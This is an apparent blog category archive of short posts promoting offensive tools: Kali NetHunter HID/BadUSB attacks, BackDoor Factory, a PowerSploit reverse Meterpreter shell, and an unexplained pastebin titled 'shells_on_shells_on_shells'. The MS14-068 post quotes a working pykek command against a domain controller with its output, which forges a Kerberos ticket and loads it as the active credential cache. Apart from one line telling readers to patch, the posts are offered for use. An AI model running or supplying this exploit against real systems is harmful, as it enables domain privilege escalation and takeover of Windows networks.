Category Archives: Exploit Tools of the Moment

BackDoor Factory

So, I just recently built out a Kali NetHunter instance on a Nexus 7. I was catching this video regarding BackDoor Factory. All I can say is it's pretty slick. Be sure to check it out.

After just a little time with NetHunter, the BadUSB and all the HID attacks seem to be my favorite thus far from light use. The wireless stuff is cool, but I still haven't found the right need for my personal use where the Nexus/OTG/USB wireless adapter beats out a laptop yet. I hear the Nexus 9 supports full monitor mode with the built-in device wireless; that's a game changer if it does.

I want to start making some custom actions for the HID attacks. The PowerSploit reverse Meterpreter shell is pretty slick; I'm just thinking of a few others I may want to use myself (all of which will probably derive from that).

MS14-068 fun!

Make sure to check out the Python Kerberos Exploitation Kit. And if you haven’t patched your DCs, get on it.

From the pykek github page:

[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file '[email protected]'... Done!
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0 

shells_on_shells_on_shells

Also check out this pastebin. http://pastebin.com/fx7efUvS